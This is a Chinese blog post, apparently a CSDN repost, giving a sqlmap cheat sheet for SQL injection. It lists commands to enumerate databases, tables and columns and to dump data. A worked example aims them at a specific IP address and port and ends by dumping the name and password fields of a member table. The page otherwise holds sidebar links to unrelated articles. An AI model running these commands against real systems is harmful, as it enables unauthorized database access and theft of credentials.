当前位置:网站首页>sqlmap注入教程 常用指令
sqlmap注入教程 常用指令
2022-07-31 05:10:00 【不习惯有你】
sqlmap 官网:sqlmap: automatic SQL injection and database takeover tool
sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage
–hh 帮助手册 详细重点部分
sqlmap.py -u “注入地址” --dbs // 列举数据库
sqlmap.py -u “注入地址” --current-db // 当前数据库
sqlmap.py -u “注入地址” --users // 列数据库用户
sqlmap.py -u “注入地址” --current–user // 当前用户
sqlmap.py -u “注入地址” --tables -D “数据库” // 列举数据库的表名
sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” //获取数据库下表的列信息最好在指令后面加 --level 3 --risk2,可以提升扫描时的深度于速率
--delay=1 指的是一秒钟发一个包
例如:
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” --dbs //爆库
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup --tables //爆表
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns 爆列
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member -C name,password --dump 爆字段值
尊重原创:
装载于:https://www.csdn.net/tags/NtjaAgzsNDk2NTMtYmxvZwO0O0OO0O0O.html
边栏推荐
- 11 【组件通信】
- numpy和pytorch中的元素拼接操作:stack,concatenat,cat
- C语言文件读、写、定位函数
- leetcode-每日一题565. 数组嵌套(标记图和并查集)
- tf.keras.utils.get_file()
- [Introduction to MySQL 8 to Mastery] Basics - silent installation of MySQL on Linux system, cross-version upgrade
- torch.normal function usage
- 数据库上机实验3 连接查询和分组查询
- uni-app进阶之认证【day12】
- 剑指offer专项突击版 ---- 第1天
猜你喜欢
随机推荐
【JS面试题】面试官:“[1,2,3].map(parseInt)“ 输出结果是什么?答上来就算你通过面试
1D, 2D, 3D convolution operations in pytorch
Sword Point Offer Special Assault Edition ---- Day 2
联盟链的真实场景在哪里
12 【nextTick 过渡与动画】
[MQ I can speak for an hour]
运用flask框架发送短信验证码的流程及具体代码
数据库上机实验6 数据库完整性
gin框架学习-Casbin入门指南(ACL、RBAC、域内RBAC模型)
uni-app进阶之创建组件/原生渲染【day9】
Kubernetes加入集群的TOKEN值过期
leetcode-829. 连续整数求和(数论)
剑指offer专项突击版 ---- 第2天
11 【组件通信】
Proteus 8 Professional安装教程
leetcode-每日一题873. 最长的斐波那契子序列的长度(哈希和二分)
闭包(四)----IIFE
Distributed transaction processing solution big PK!
初涉C语言
剑指offer基础版 ---- 第29天